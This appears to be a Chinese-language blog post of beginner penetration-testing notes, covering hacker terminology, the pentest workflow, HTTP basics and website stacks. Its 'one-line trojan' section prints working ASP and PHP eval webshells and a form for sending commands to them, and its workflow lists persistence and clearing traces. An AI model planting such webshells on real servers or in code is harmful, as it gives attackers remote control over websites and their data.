hack.jpg

基础部分-科普

黑客

- Hacker音译出来的,做的不是恶意破坏,是技术人员

骇客

- 做坏事的人

红客

- 中国特色的技术人员

白帽子

- 专门研究从事网络安全行业的人

黑帽子

- 专门研究木马,操作系统,寻找漏洞,并且人为意志攻击网络或者计算机

灰帽子

- 专门研究木马,操作系统,寻找漏洞,并且人为意志攻击网络或者计算机

专业术语

1,脚本

-asp,php,jsp

2,html

- css,js,html

3,HTTP协议

- 网络传输的协议

4,CMS(B/S)

5,MD5

- 一种信息加密的方式

肉鸡

- 被黑客入侵并被长时间驻扎的计算机或者服务器

抓鸡

- 利用使用量大的程序的漏洞,使用自动化方式获取肉鸡的行为

Webshell

- 通过Web入侵的一种脚本工具,可以据此对网站服务进行一定程度的控制

漏洞

- 硬件,软件,协议等等的可利用的安全缺陷,可能被攻击者利用,对数据进行篡改,控制等。

一句话-木马

- 通过向服务端提交一句简短的代码,配合本地客户端实现webshell功能的木马
    <%eval request("pass")%>
    <%execute(request("pass"))%>
    request("pass")接受客户端提交的数据,pass为执行命令的参数值
    eval/execute 函数执行客户端命令的内容
- 如PHP的一句话木马
    - <?php eval($_POST[canshu]);?>
    - 下面的代码可以用POST的方式提交PHP语句,利用PHP脚本的各种函数,就可以实现执行系统命令,修改数据库,增删改查文件等等的各种功能
        - <form method=post action=http://木马地址>
            <textarea name=canshu>
                //这里写php代码
                phpinfo();
            </textarea>
            <input type=submit>
            </form>

提权

- 操作系统低权限的账户将自己提升为管理员权限使用的方法

后门

- 黑客为了对主机进行长期的控制,在机器上种植的一段程序或留下的一个“入口”

跳板

- 使用肉鸡IP来实施攻击其他目标,以便更好的隐藏自己的身份信息

旁站入侵

- 即同服务器下的网站入侵,入侵之后可以用通过提权跨目录等手段拿到目标网站的权限。常见的旁站查询工具有:webrobot,御剑,明小子和web在线查询等

C端入侵

- 即同C段下服务器入侵,如目标IP为192.168.1.253入侵192.168.1.*的任意一台机器,然后利用一些黑客工具嗅探获取在网络上传输的各种信息,常用的工具有:windows下有Cain,在unix环境下有sniffit,snoop,tcpdump,dsniff等等。

渗透测试

- 黑盒测试:在未授权的情况下,模拟黑客的攻击方法和思维方式,来评估计算机网络系统可能蔡遵的安全风险
- 黑盒测试不同于黑客入侵,并不等于黑站。黑盒测试考验的是综合的能力(OS,Datebase,Script,code,思路,社工)
- 思路与经验积累往往决定成败
- 三个臭皮匠赛过诸葛亮
- 白盒测试:相对黑盒测试,白盒测试基本是从内部发起
- 黑白盒的另一种说法,知道源代码和不知道源代码的渗透测试,这时,黑盒测试还是传统的渗透测试,而白盒测试就偏向于代码审计
- APT攻击:Advanced Persistent Threat,高级可持续性攻击,是指组织(特别是政府)或者小团体利用先进的攻击手段对特定目标进行长期持续性网络攻     击的攻击形式。
    1极强的隐蔽性
    2.潜伏期长,持续性强
    3.目标性强
- 渗透测试的特点
    充满挑战与刺激---不达目的不罢休
    思路与经验累积往往决定成败
    三个臭皮匠赛过诸葛亮

渗透测试的流程

渗透测试

-更全面地找出服务 的问题,更倾向于保护。

入侵

-不摔手段地(甚至是具有破坏性的)拿到权限。

明确目标 信息收集 漏洞探测 漏洞验证 信息分析 获取所需 信息整理 形成报告

明确目标

- 确定范围
- 确定规则
- 确定需求

信息采集

- 基础信息
- 系统信息
- 应用信息
- 版本信息
- 服务信息
- 人员信息
- 防护信息 

漏洞探测

- 系统漏洞
- WebServer漏洞
- Web应用漏洞
- 其他端口服务漏洞
- 通信安全

漏洞验证

- 自动化验证
- 手工验证
- 试验验证
- 登陆猜解
- 业务漏洞验证
- 公开资源的利用

信息分析

- 精准打击
- 绕过防御机制
- 定制攻击路径
- 绕过检测机制
- 攻击代码

获取所需

- 实施攻击
- 获取内部信息
- 进一步渗透
- 持续性存在
- 清理痕迹

信息整理

- 整理渗透工具
- 整理收集信息
- 整理漏洞信息

形成报告

- 按需整理
- 补充介绍
- 修补建议 

经验分享

- 息搜集是关键
- 做事不要太心急
- 多学习,多看源码
- 平时注意搜集Oday
- 思路很重要

学会安装虚拟机VMware和虚拟机安装各种系统

- windows
    - windows 2003
    - windows 2006
    - windows 7
    - windows xp
    - windows 10
- linux
    - ubuntu
    - centos
    - debian

常用的一些快捷键

- Win+R 运行
    - ncpa.cpl 快速打开网络适配器
    - cmd 快速打开命令窗口
    - ipconfig 快速查看网卡配置信息

网站篇

http讲解

http协议

-超文本传输协议
-(HТТP,HyperText Transfer Protocol)是互联网上应用最为广泛的一种网络协议。所有的WwW文件都必须遵守这个标准。设计HTTP最初的目的是为了提供一种发布和接收HTML页面的方法

http头讲解

- 200响应码
- date日期
- content-type类型
- Accept-Charset:浏览器可接受的字符集。
- Content-Length:表示请求消息正文的长度。
- Cookie:这是最重要的请求头信息之一
- http://www.ctimo.com
- 例子
    -# curl -I www.baidu.com
    HTTP/1.1 200 OK
    Accept-Ranges: bytes
    Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
    Connection: keep-alive
    Content-Length: 277
    Content-Type: text/html
    Date: Thu, 12 Dec 2019 03:13:59 GMT
    Etag: "575e1f5c-115"
    Last-Modified: Mon, 13 Jun 2016 02:50:04 GMT
    Pragma: no-cache
    Server: bfe/1.0.8.18

静态网站

- 静态网站是指全部由HTML(标准通用标记语言的子集)代码格式页面组成的网站所有的内容包含在网页文件中。网页上也可以出现各种视觉动态效果,如GIF动画FLASH动画、滚动字幕等,而网站主要是静态化的页面和代码组成,一般文件名均以htmhtml shtm等为后缀

动态网站

- 动态网站并不是指具有动画功能的网站,而是指网站内容可根据不同情况动态变更的网站,一股情况下动态网站通过数据库进行架构。动态网站除了要设计网页外,还要通过数据库和编程序来使网站具有更多自动的和高级的功能。动态网站体现在网页一般是以asp,jsp,php,aspx等结束,而静态网页一股是HTML(标准通用标记语言的子集)结尾,动态网站服务器空间配置要比静态的网页要求高,费用也相应的高,不过动态网页利于网站内容的更新,适合企业建站。动态是相对于静态网站而言。

网站搭建

- 1 Windows+iis+asp+access
- 2 windows+iis +asp +mssgl
- 1.Windows+asp小旋风+asp+access
- 1 windows+apmserv+php+mysql
- 2 windows+tomcat+ jsp +mysql
- 1 linux+apche+php+mysal
Last modification:December 12th, 2019 at 04:43 pm
如果觉得我的文章对你有用,请随意赞赏